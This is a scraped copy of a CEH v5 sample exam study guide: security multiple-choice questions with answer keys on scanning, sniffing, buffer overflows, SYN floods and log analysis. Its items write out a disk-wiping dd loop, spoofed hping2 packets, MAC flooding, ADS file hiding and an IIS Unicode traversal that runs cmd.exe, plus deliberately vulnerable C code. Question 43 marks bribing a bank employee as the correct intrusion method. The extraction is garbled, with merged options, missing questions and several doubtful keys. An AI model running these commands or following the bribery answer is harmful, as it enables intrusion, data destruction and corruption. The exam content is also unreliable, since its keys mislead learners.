Upload
api-3699464
View
245
Download
0
Embed Size (px)
Citation preview
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 1/90
Do not distribute this documentPrepared by Chan Tseng Loo, Beijing China
CEHv5 Sample Exam Questions
1.
Which command in Linux produces IP address and MAC address output?
A. sudo nmap -sP 192.168.0.1/24B. root nmap -sA 192.168.0.1/24C. run nmap -TX 192.168.0.1/24D. launch nmap -PP 192.168.0.1/24
Ans: a
2.
What filter in ethereal will you use to view hotmail messages?
a. (http contains "hotmail") && (http contains "Reply-To") b. (http contains "e-mail") && (http contains "hotmail")c. (http = "login.passport.com") && (http contains "SMTP")d. (http = "login.passport.com") && (http contains "POP3")
Ans: a
3.
What does this command do?
for (( i = 0;i<11;i++ )); dodd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda
done
a. He is making a bit stream copy of the entire hard disk for later download b. He is deleting log files to remove his tracec. He is wiping the contents of the hard with zerosd. He is infecting the hard disk with random virus strings
And: c
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 2/90
4.
How would you permanently wipe the data in the hard disk?
a. $ wipe -fik /dev/hda1 b. $ erase -fik /dev/hda1
c. $ delete -fik /dev/hda1
d. $ secdel -fik /dev/hda1
Ans: a
5.
Which commands scans for rootkits?
a. $ sudo chrootkit
b. $ sudo avcheck
c. $ sudo runvirus
d. $ sudo rootvirus
Ans: a
6.
802.11a uses:
a. 5.15-5.825 GHz b. 2.412-2.462 GHzc. 2.323-2.462 GHzd. 900MHz-2.462 GHz
Ans: a
7.
What commands will you use in google to view linked pages?
a. link:www.xsecurity.com b. search?l:www.xsecurity.comc. level1:www.xsecurity.comd. pagerank:www.xsecurity.com
Ans: a
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 3/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 4/90
How do you stop web spidering?
a. Place robots.txt file in the root of your website with listing of directories that youdon’t want to be crawled
b. Place authentication on directories that will prevent crawling from these spidersc. Enable SSL on the restricted directories which will block these spiders fromcrawling
d. Place “HTTP:NO CRAWL” on the html pages that you don’t want the crawlers toindex
Ans: a
12.
What is the hexadecimal value of NOP instruction?
a. 0x90 b. 0x80c. 0x70d. 0x60
Ans: a
13.
When writing shellcodes, you must avoid ____________ because these will end thestring.
A. null bytesB. root bytesC. char bytesD. Unicode bytes
Ans: a
14.
Which of the following exclusive OR transforms bits is NOT correct?
A. 1 xor 1 = 1
B. 0 xor 0 = 0
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 5/90
C. 1 xor 0 = 1
D. 0 xor 1 = 1
Ans: a
15.
How does a polymorphic shellcode work?
a. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode
b. They convert the shellcode into Unicode, using loader to convert back to machinecode then executing them
c. They reverse the working instructions into opposite order by masking the IDS
signaturesd. They compress shellcode into normal instructions, uncompress the shellcodeusing loader code and then executing the shellcode
Ans: a
16.
In Buffer Overflow exploit, which of the following registers gets overwritten with returnaddress of the exploit code?
a. EIP b. ESPc. EAPd. EEP
Ans: a
17.
Which type of scan does not open a full TCP connection?
a. Stealth Scan b. XMAS Scanc. Null Scand. FIN Scan
Ans: a
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 6/90
18.
How do you prevent a hacker from launching FIN, NULL, and X-MAS scans on your
network?
A. Modify the kernel to never send reset packetsB. Block TCP/IP packets with FIN flag enabled at the firewallC. Enable IDS signatures to block these scansD. You cannot block a hacker from launching these scans on your network
Ans: a
19.
Which of the following encryption is not based on block cipher?
a. DES b. Blowfishc. AES (Rijndael)d. RC4
Ans: d
20.
TCP/IP Session Hijacking is carried out in which OSI layer?
a. Transport layer b. Datalink layer c. Network Layer d. Physical Layer
Ans: a
21.
SNMP is a connectionless protocol that uses UDP instead of TCP packets (True or False)
Ans: True
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 7/90
22.
What defensive measures will you take to protect your network from password brute
forcing attacks? (Select all that apply)a. Never leave a default password. b. Never use a password that can be found in a dictionary.c. Never use a password related to the hostname, domain name, or anything else that
can be found with whois.d. Never use a password related to your hobbies, pets, relatives, or date of birth.e. Use a word that has more than 21 characters from a dictionary as the password
Ans: a,b,c,d
23.
An SNMP scanner is a program that sends SNMP requests to multiple IP addresses,trying different community strings and waiting for a reply. Unfortunately SNMP serversdon't respond to requests with invalid community strings and the underlying protocoldoes not reliably report closed ports. This means that 'no response' from the probed IPaddress can mean which of the following: (Select 3 answers)
a. Machine unreachable b. SNMP server not running
c. Invalid community stringd. S-AUTH protocol is running on the SNMP server
Ans: a,b,c
24.
You want to retrieve the Cisco configuration from the router. How would you proceed?(Select 2 answers)
A. Send a customized SNMP set request with a spoofed source IP address in therange - 192.168.1.0B. Run a network sniffer and capture the returned traffic with the configuration file
from the router C. Run Generic Routing Encapsulation (GRE) tunneling protocol from your
computer to the router masking your IP addressD. Use the Cisco’s TFTP default password to connect and download the
configuration file
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 8/90
Ans: a,b
25.
How would you discover what telephone numbers to dial-in to the router?
a. Search the Internet for leakage of target company’s telephone number to dial-in b. Run a war-dialing tool with range of phone numbers and look for CONNECT
responsec. Connect using ISP’s remote-dial in number since the company’s router has a
leased line connection established with themd. Brute force the company’s PABX system to retrieve the range of telephone
numbers to dial-in
Ans: b
26.
Hackers usually control Bots through:
IRC ChannelMSN Messenger Trojan client softwareYahoo Chat
GoogleTalk
Ans: a
27.
How would you detect DNS reflectors on your network?
a. Run floodnet tool to detect these reflectors b. Scan the network using Nmap for the services used by these reflectors
c. Look for the banner text by running Zobbie Zappers toolsd. Run Vulnerability scanner on your network to detect these reflectors
Ans: b
28.
What type of attacks target DNS Servers DOS?
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 9/90
a. DNS reflector and amplification attack b. DNS cache poisoning attacksc. DNS reverse connection attacksd. DNS forward lookup attacks
Ans: a
29.
________ is a Cisco IOS mechanism that examines packets on Layers 4 to 7.
a. Network-Based Application Recognition (NBAR) b. Denial of Service Filter (DOSF)c. Rule Filter Application Protocol (RFAP)
d. Signature-Based Access List (SBAL)Ans: a.
30.
What does the following command do?
CEH# hping2 -I eth0 -a 10.0.0.6 -s 1037 -p 22 --syn -c 1 -d 0xF00 --setseq0x0000000f 192.168.0.9
a. This command will generate a single TCP SYN packet with source port 1037,destination port 22, with a sequence number 15 spoofing the IP address 10.0.0.6
b. This command will generate a single TCP UDP packet with source port 1037,destination port 15, with a sequence number 22 spoofing the IP address192.168.0.9
c. This command will generate a multiple TCP SYN/ACK packets with source port22, destination port 1037, with a sequence number 19 spoofing the IP address192.168.0.9
d. This command will generate multiple TCP SYN packets with source port 1037,destination port 22, with a sequence number 15 spoofing the IP address 10.0.0.6
Ans: a
31.
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 10/90
What of the following is a IDS defeating technique?
a. IP Fragmentation or Session Splicing b. IP Routing or Packet Droppingc. IDS Spoofing or Session Assembly
d. IP Splicing or Packet ReassemblyAns: a
32.
How do you defend against SSL attacks?
a. Install a proxy server and terminate SSL at the proxy b. Install a hardware SSL “accelerator” and terminate SSL at this layer
c. Enable the IDS to filter encrypted HTTPS trafficd. Enable the Firewall to filter encrypted HTTPS traffic
Ans: a.b
33.
A digital signature is simply a message that is encrypted with the public key instead of the private key (True or False)
Ans: False
34.
What is p and q in terms of PKI?
a. factorization b. prime detectionc. hashingd. brute-forcing
ans: a
35.
How do you block password brute forcing?
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 11/90
A. Enforce a password policy and use account lockouts after three wrong logonattempts even though this might lock out legit users
B. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about theIP address of the intruder so that you can block them at the Firewall manually
C. Enforce complex password policy on your network so that passwords are more
difficult to brute forceD. You cannot completely block the intruders attempt if they constantly switch proxies
Ans: d
36.
What attacks can you successfully launch against a server using the SYN/ACK technique?
a. Session Hijacking attacks b. Denial of Service attacksc. Web page defacement attacksd. IP spoofing attacks
Ans: a
37.
How do you protect your network against SYN Flood attacks? (Select all that apply)
a. SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefullyconstructed sequence number generated as a hash of the clients IP address, portnumber, and other information. When the client responds with a normal ACK,that special sequence number will be included, which the server then verifies.Thus, the server first allocates memory on the third packet of the handshake, notthe first
b. RST cookies - The server sends a wrong SYN/ACK back to the client. The clientshould then generate a RST packet telling the server that something is wrong. Atthis point, the server knows the client is valid and will now accept incoming
connections from that client normallyc. Micro Blocks. Instead of allocating a complete connection, simply allocate amicro-record of 16-bytes for the incoming SYN object
d. Stack Tweaking. TCP stacks can be tweaked in order to reduce the effect of SYNfloods. Reduce the timeout before a stack frees up the memory allocated for aconnection
e. Check the incoming packet’s IP address with the SPAM database on the Internetand enable the filter using ACLs at the Firewall
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 12/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 13/90
Which event log located at c:\windows\system32\config contains the trace of your bruteforce attempts?
a. AppEvent.Evt
b. SecEvent.Evtc. SysEvent.Evtd. WinEvent.Evt
Ans: b
42.
If the password is 7 characters or less, than the second half of the LM hash is always:
0xAAD3B435B51404EE0xAAD3B435B51404AA0xAAD3B435B51404BB0xAAD3B435B51404CC
Ans: a
43.
How do you penetrate high security systems such as banks?
a. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they’ll abuse their access privileges by providing you with sensitive information
b. Look for “zero-day” exploits at various underground hacker websites in Russiaand China and buy the necessary exploits from these hackers and target the bank’snetwork
c. Launch DDOS attacks against Merclyn Barley Bank’s routers and firewallsystems using 100,000 or more “zombies” and “bots”
d. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network trafficgoing to the Merclyn Barley Bank’s Webserver to that of your machine using
DNS Cache Poisoning techniquesAns: a
44.
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 14/90
What is “weakest Link”?
1. Untrained staff or ignorant computer users who inadvertently become the weakestlink in your security chain
2. “zero-day” exploits are the weakest link in the security chain since the IDS will
not able to detect these attacks3. “Polymorphic viruses” are the weakest link in the security chain since the Anti-Virus scanners will not able to detect these attacks
4. Continuous Spam e-mails cannot be blocked by your security system sincespammers use different techniques to bypass the filters in your gateway.
Ans: a
45.
What is the UK cybercrime law called?a. Computer Misuse Act 1990 b. Computer Incident Act 2000c. Cyber Crime Law Act 2003d. Cyber Space Crime Act 1995
Ans: a
46.
You can always defend yourself by "ignorance of the law" clause. (True or False)
Ans: False
47.
Technique to prevent against password attacks?
a. Implement Biometrics based password authentication system. Record the
customers face image to the authentication database b. Configure your firewall to block logon attempts of more than three wrong triesc. Implement RSA SecureID based authentication systemd. Enable a complex password policy of 20 characters and ask the user to change the
password immediately after they logon and do not store password histories
Ans: c
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 15/90
48.
Every company needs this document?
a. Information Security Policy (ISP) b. Information Audit Policy (IAP)c. Penetration Testing Policy (PTP)d. User Compliance Policy (UCP)
Ans: a
49.
This is a patch management utlitya. MBSA b. BSSAc. ASNBd. PMUS
Ans: a
50.
Windows is dangerously insecure when unpacked from the box, and there are a fewthings that you must do before you use it. (Select all that apply)
a. New installation of Windows should be patched by installing the latest service packs
b. Key applications such as Adobe Acrobat, Macromedia Flash, Java, Winzip etcmust have the latest security patches installed
c. Install a personal firewall and lock down unused ports from connecting to your computer
d. Install the latest signatures for Antivirus software
e. Configure “Windows Update” to automaticf. Create a non-admin user with a complex password and logon to this accountg. You can start using your computer since the vendor such as DELL, HP and IBM
already would have installed the latest service packs up-to-date
Ans: a,b,c,d
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 16/90
51.
Which switch shows you the application listening on ports?
1. netstat -anb -p tcp2. netstat -an -p tcp –x3. netstat -an -p tcp –c4. netstat -an -p tcp –l
Ans: a
52.
Test virus is created by:
a. Type the following code in notepad and save the file as EICAR.COM. Your
antivirus program springs into action whenever you attempt to open, run or copyit.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-
TEST-FILE!$H+H*
b. Type the following code in notepad and save the file as AVFILE.COM. Your antivirus program springs into action whenever you attempt to open, run or copyit.
X5O!P%@AP[4\PZX54(P^)7CC)7}$AVFILE-STANDARD-ANTIVIRUS-
TEST-FILE!$H+H*
c. Type the following code in notepad and save the file as TESTAV.COM. Your antivirus program springs into action whenever you attempt to open, run or copyit.
X5O!P%@AP[4\PZX54(P^)7CC)7}$TESTAV-STANDARD-ANTIVIRUS-
TEST-FILE!$H+H*
d. Type the following code in notepad and save the file as SAMPLEVIRUS.COM.Your antivirus program springs into action whenever you attempt to open, run or copy it.
X5O!P%@AP[4\PZX54(P^)7CC)7}$SAMPLEVIRUS-STANDARD-
ANTIVIRUS-TEST-FILE!$H+H*
Ans: a
53.
Joke viruses are called?
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 17/90
1. Virus hoax2. Spooky Virus3. Stealth Virus4. Polymorphic Virus
Ans: a
54.
Act to prevent SPAM e-mails
a. 2004 CANSPAM Act b. 2003 SPAM Prevention Actc. 2005 US-SPAM 1030 Act
d. 1990 Computer Misuse ActAns: a
55.
Passwords are never cracked in these attacks
a. Replay Attacks b. Brute Force Attacks
c. Cryptography Attacksd. John the Ripper Attacks
Ans: a
56.
This is an authentication method in which is used to prove that a party knows a passwordwithout transmitting the password in any recoverable form over a network. Thisauthentication is secure because the password is never transmitted over the network, even
in hashed form; only a random number and an encrypted random number are sent.
a. Challenge/Response Authentication b. Basic Form Authenticationc. Realm Authenticationd. SSL Authenticatione. Cryptographic Authentication
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 18/90
Ans: a
57.
Where are password files kept in Linux?
a. /etc/shadow b. /etc/passwdc. /bin/passwordd. /bin/shadow
Ans: a
58.
You are configuring the security options of your mail server and you would like to block certain file attachments to prevent viruses and malware from entering the users inbox.
Which of the following file formats will you block? (Select all that apply)
a. .pif b. .scr c. .txtd. .come. .exe
f. .rar g. .vbsh. .htai. .jpg
Ans: a,b,d,e,g,h
59.
This tool floods the switch with bogus MAC addresses
a. ./macof b. ./sniffof c. ./dsniff d. ./switchsnarf
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 19/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 20/90
a. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
b. HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Start
c. HKEY_LOCAL_SYSTEM\SOFTWARE\Microsoft\Windows\CurrentVersion\Auto
d. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Desktop
Ans: a
64.
How would you prevent users computer at home using VPN safe?a. Disable VPN access to all your employees from home machines b. Allow VPN access but replace the standard authentication with biometric
authenticationc. Replace the VPN access with dial-up modem access to the company’s network d. Enable 25 character complex password policy for employees to access the VPN
network
Ans: a
65.
Which programming language is NOT vulnerable to buffer overflow attacks?
a. Java b. ActiveXc. C++d. Assembly Language
Ans: a
66.
How do you secure GET method in web page posts?
A. Replace the GET with POST method when sending dataB. Never include sensitive information in a scriptC. Use HTTPS SSLv3 to send the data instead of plain HTTPS
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 21/90
D. Encrypt the data before you send using GET method
Ans: a
67.
Two types of BO
a. Stack based buffer overflow b. Active buffer overflowc. Dynamic buffer overflowd. Heap based buffer overflow
Ans: a,d
68.
Which of the following line in the C++ source code is vulnerable to buffer overflowexploits?
1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <string.h>
4. #include <ctype.h>
5. #define MAXNAMELEN 50
6. #define MAXLINELEN 500
7. int FullFlag;
8. //Deletes the first word from a string
9. char *delfirstword(char *s)
10. {
11. char *sout = (char *)malloc(strlen(s));
12. int i = 0, i2 = 0;
13. if (s[0] == (char)NULL) return s;
14. while (isspace(s[i])) i++;
15. while ((!isspace(s[i])) && (s[i] != (char)NULL)) i++;
16. if (s[i] == (char)NULL) return "";
17. while ((isspace(s[i])) && (s[i] != (char)NULL)) i++;
18. while (s[i] != (char)NULL)
19. {
20. sout[i2] = s[i];
21. i++; i2++;22. }
23. sout[i2] = (char)NULL;
24. return sout;
25. }
26. //Returns the soundex equivalent to In
27. char *Soundex(char *In)
28. {
29. int Iin, Iout;
30. char C, PrevDig, *Out = (char *)malloc(10);
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 22/90
31. if (FullFlag)
32. {Iin = 0; Iout = 0; PrevDig = '*';}
33. else
34. {Iin = 1; Iout = 1;
35. Out[0] = tolower(In[0]); PrevDig = Out[0];}
36. while ((In[Iin] != (char)NULL) && (Iout <= 4))
37. {
38. In[Iin] = tolower(In[Iin]);
39. switch (In[Iin])
40. {
41. case 'b' : C = '1'; break;
42. case 'p' : C = '1'; break;
43. case 'f' : C = '1'; break;
44. case 'v' : C = '1'; break;
45. case 'c' : C = '2'; break;
46. case 's' : C = '2'; break;
47. case 'k' : C = '2'; break;
48. case 'g' : C = '2'; break;
49. case 'j' : C = '2'; break;
50. case 'q' : C = '2'; break;
51. case 'x' : C = '2'; break;52. case 'z' : C = '2'; break;
53. case 'd' : C = '3'; break;
54. case 't' : C = '3'; break;
55. case 'l' : C = '4'; break;
56. case 'm' : C = '5'; break;
57. case 'n' : C = '5'; break;
58. case 'r' : C = '6'; break;
59. default : C = '*';
60. }
61. if ((C != PrevDig) && (C != '*'))
62. {
63. Out[Iout] = C;
64. PrevDig = Out[Iout];
65. Iout++;
66. }
67. Iin++;
68. }
69. if (Iout < 4)
70. for (Iin=Iout; Iin<4; Iin++)
71. Out[Iin] = '0';
72. Out[4] = NULL;
73. return Out;
74. }
75. //Main function
76. int main(int argc, char *argv[])
77. {
78. char *Name = (char *)malloc(MAXNAMELEN), *Line = (char*)malloc(MAXLINELEN);
79. int I;
80. FullFlag = 0;
81. if (argc >= 2)
82. {
83. if (!strcmp(argv[1], "-f"))
84. FullFlag = 1;
85. if ((!strcmp(argv[1], "-h")) || (!strcmp(argv[1], "-?")) ||
86. (!strcmp(argv[1], "?")))
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 23/90
87. {
88. printf("Usage: soundex [-f] <name1> <name2> ...\n\n");
89. printf("-f treats the first character of name just like the
others.\n");
90. printf("If no names are specified in the arguments, soundex
will read\n");
91. printf("from the standard input until end of file is
encountered.\n");
92. printf("Note that names of two characters or less are
disregarded.\n");
93. }
94. }
95. if (FullFlag && (argc >= 3))
96. {
97. for (I=2; I<=(argc-1); I++)
98. if (strlen(argv[I]) >= 3)
99. printf("%s ", Soundex(argv[I]));
100. printf("\n");
101. return 0;
102. }
103. if ((!FullFlag) && (argc >= 2))104. {
105. for (I=1; I<=(argc-1); I++)
106. if (strlen(argv[I]) >= 3)
107. printf("%s ", Soundex(argv[I]));
108. printf("\n");
109. return 0;
110. }
111. while (gets(Line) != NULL)
112. {
113. while (strcmp(Line, ""))
114. {
115. sscanf(Line, "%s", Name);
116. if (strlen(Name) >= 3)
117. printf("%s ", Soundex(Name));
118. strcpy(Line, delfirstword(Line));
119. }
120. printf ("\n");
121. }
122. free(Line); free(Name);
123. return 0;
124. }
Type the line number here: 118
69.
Which of the following built-in C/C++ functions you should avoid to prevent your program from buffer overflow attacks? (Select 3 answers)
a. strcpy()
b. strcat()
c. streadd()
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 24/90
d. strlength()
Ans: a,b,c
70.
What is the countermeasure against XSS scripting?
1. Create an IP access list and restrict connections based on port number 2. Replace “<” and “>” characters with “<” and “>” using server
scripts3. Disable Javascript in IE and Firefox browsers4. Connect to the server using HTTPS protocol instead of HTTP
Ans: b
71.
Microsoft Authenticode technology is used for:
a. Digitally signing ActiveX controls b. Digitally signing SSL certificatesc. Digitally signing Javascript filesd. Digitally signing Java Applets
Ans: a
72.
Data is sent over the network as clear text (unencrypted) when Basic Authentication isconfigured on Web Servers? (True or False)
Ans: True
73.
How do you defend against ARP Spoofing? (Select 3 answers)
a. Place static ARP entries on servers, workstation and routers b. Tune IDS Sensors to look for large amount of ARP traffic on local subnetsc. Use private VLANSd. Use ARPWALL system and block ARP spoofing attacks
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 25/90
Ans: a,b,c
74.
You are trying to hijack a telnet session from a victim machine with IP address 10.0.0.5to Cisco router at 10.0.0.1. You sniff the traffic and attempt to predict the sequence andacknowledgement numbers to successfully hijack the telnet session.
Here is the captured data in tcpdump.
Victim Machine Router
10.0.0.5 ------------------------ 10.0.0.1
SYN Seq.no. 17768656 ----------
(next seq.no. 17768657)
Ack.no. 0Window 8192
LEN = 0 bytes
--------------------------------- SYN-ACK
Seq.no. 82980009
(next seq.no. 82980010)
Ack.no. 17768657
Window 8760
LEN = 0 bytes
ACK Seq.no. 17768657 ----------
(next seq.no. 17768657)
Ack.no. 82980010Window 8760
LEN = 0 bytes
Seq.no. 17768657 ----------------
(next seq.no. 17768729)
Ack.no. 82980010
Window 8760
LEN = 72 bytes of data
---------------------------------- Seq.no. 82980010
(next seq.no. 82980070)
Ack.no. 17768729
Window 8688LEN = 60 bytes of data
Seq.no. 17768729 -----------------
(next seq.no. 17768885)
Ack.no. 82980070
Window 8700
LEN = 156 bytes of data
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 26/90
---------------------------------- Seq.no. ????????
Ack.no. ????????
Window 8532
LEN = 152 bytes of data
What are the next sequence and acknowledgement numbers that the router will send to
the victim machine?
Sequence number: 82980070 Acknowledgement number: 17768885Sequence number: 17768729 Acknowledgement number: 82980070Sequence number: 87000070 Acknowledgement number: 85320085Sequence number: 82980010 Acknowledgement number: 17768885
Ans: a
75.
FIN Scanning does not correctly work on which of the following machines?
a. Windows machines b. Linux machinesc. Sun Solaris machinesd. WiFi Devices
Ans: a
76.
This scanning technique sends the probe packet, splitting up the TCP header over several packets to make it harder for packet filters to detect what is happening.
a. SYN Scanning b. XMAS Scanningc. Fragmentation Scanningd. Stealth Scanning
Ans: c
77.
What is the term used in serving different types of web pages based on the users IPaddress?
1. Website Cloaking
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 27/90
2. Website Filtering3. IP Access Blockade4. Mirroring Website
Ans: a
1. Dan is conducting a pen-test and has found a vulnerability in a Web App which gavehimthe sessionID token via a cross site scripting vulnerability. Dan wants to replay thistoken.However, the session ID manager (on the server) checks the originating IP address aswell. Dan decides to spoof his IP address in order to replay the sessionID. Why do youthink Dan might not be able to get an interactive session?
a. The server will send replies back to the spoofed IP address and hence
interactivity would be difficult* b. Dan cannot spoof his IP address over TCP network c. The scenario is incorrect as Dan can spoof his IP and get responsesd. Dan can establish an interactive session only if he uses a NAT
2. Clive is conducting a pen-test and has just port scanned a system on the network. Hehasidentified the operating system as Linux and been able to elicit responses from ports 23,25 and 53. He infers port 23 as running Telnet service, port 25 as running SMTP serviceand port 53 as running DNS service. The client confirms these findings and attests to thecurrent availability of the services.
When he tries to telnet to port 23 or 25, he gets a blank screen in response. On typingother commands, he sees only blank spaces or underscores symbols on the screen. Whatare you most likely to infer from this?
a. This indicates that the telnet and SMTP server have crashed b. There is a honeypot running on the scanned machinec. The services are protected by TCP wrappers*d. An attacker has replaced the services with trojaned ones
3. Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able toreplay
the cookie even while the session is valid on the server. Why do you think this is possible?
a. It works because any encryption is performed at the application layer (singleencryption key)* b. The scenario is invalid as a secure cookie cannot be replayedc. It works because any encryption is performed at the network layer (layer 1encryption)
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 28/90
d. Any cookie can be replayed irrespective of the session status
4. Study the snort rule given below and interpret the rule. Choose the correct optionalert tcp any any -> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";)
a. An alert is generated when a TCP packet is generated from any IP on the192.168.1.0 subnet and destined to any IP on port 111 b. An alert is generated when a TCP packet originating from any IP address is seenon the network and destined for any IP address on the 192.168.1.0 subnet on port111*c. An alert is generated when any packet other than a TCP packet is seen on thenetwork and destined for the 192.168.1.0 subnetd. An alert is generated when a TCP packet is originated from port 111 of any IPaddress to the 192.168.1.0 subnet
5. What is the command used to create a binary log file using tcpdump?
a. tcpdump -w ./log* b. tcpdump -r logc. tcpdump -vde –r logd. tcpdump -l /var/log/
6. what scan type usedtcpdump -vv -x host 192.168.1.1017:35:06.731739 eth0 < 192.168.1.10 > victim: ip-proto-130 0 (ttl 59, id 42060)4500 0014 a44c 0000 3b82 57b8 c0a8 010ac0a8 0109 0000 0000 0000 0000 0000 00000000 0000 0000 0000 0000 0000 0000a. nmap -sO -T 192.168.1.10* b. nmap –sS 192.168.1.10c. nmap –sV 192.168.1.10d. nmap –sR 192.168.1.10
7. Study the following log extract and answer the questions below12/26-07:06:01.155349 128.173.37.135:1443 -> 172.16.1.106:80TCP TTL:13 TOS:0x40 ID:35491 IpLen:20 DgmLen:493 DF***AP*** Seq: 0x2BDC107 Ack: 0x1CB9F186 Win: 0x2238 TcpLen: 2047 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E GET /msadc/.....2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F ./....../....../77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A md.exe?/c+dir+c:5C 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 \ HTTP/1.1..AcceIdentify the Attack a. Hexcode Attack b. Unicode Directory Traversal Attack*c. Cross Site Scripting
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 29/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 30/90
12. What is the attacker ultimately trying to achieve as inferred from the log sequence?a. Extract information from a local directory b. Change password of user nobodyc. Change the files Modification Access Creation times*d. Download rootkits and passwords into a new directory
13. How many user ids can you identify in these log entries that the attacker has tamperedwith?a. nobody, dns* b. acmr, dnsc. IUSR_<machine_name>d. nobody, IUSR_<machine_name>
14. Which tool/utility can help you extract the application layer data from each TCPconnection from a log file into separate files?a. Snort
b. TCPflow*c. Tcpdumpd. argus
15. Which of the following represents the initial two commands that an IRC client sendsto join an IRC network?a. USER, PASS b. USER, NICK*c. LOGIN, USER d. LOGIN, NICK
16. A ______ is an automated client that is remotely controlled via a network a. Probe b. Autorooter c. Bot*d. Zombie
17. _______ is a utility which exploits the nature of white space and allows the user toconceal information in these white spaces.a. Snow* b. Image Hidec. Gif-It-Upd. NiceText
18. Null sessions are un-authenticated connections (not using a username or password.) toan NT or 2000 system. Which TCP and UDP ports must you filter to check null sessionson your network?a. 137 and 139
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 31/90
b. 139 and 445*c. 139 and 443d. 137 and 443
19. ________ is found in all version of NTFS and is described as the ability to fork file
datainto existing files without affecting their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer a. Steganography b. Merge Streamsc. Alternate Data Streams*d. NetBIOS vulnerability
20. What vulnerability does the following command take advantage of?type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exea. HFS
b. ADS*c. NTFSd. Backdoor access
21. Jake works as a system administrator at Acme Corp. Jason, an accountant of the firm befriends him at the canteen and tags along with him on the pretext of appraising himabout potential tax benefits. Jason waits for Jake to swipe his access card and follows himthrough the open door into the secure systems area. How would you describe Jason’s behavior within a security context?a. Smooth Talking b. Swipe Gatingc. Trailingd. Tailgating*
22. ________ is a program that appears to perform a desirable and necessary function but(because of unauthorized code within it that is unknown to the user) performs functionsunknown (and definitely unwanted) by the user.a. Virus b. Keylogger c. Trojan*d. Sniffer
23. Which of the following is not considered to be a part of active sniffing?a. ARP Spoofing b. MAC Duplicatingc. SMAC Fueling*d. MAC Flooding
24. ARP poisoning is achieved in ____ stepsa. 3
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 32/90
b. 2*c. 1d. 4
25. Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown
below.Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;What attack is being depicted here?a. Session Hijacking b. Cookie Stealingc. Parameter Manipulation*d. Cross Site Scripting
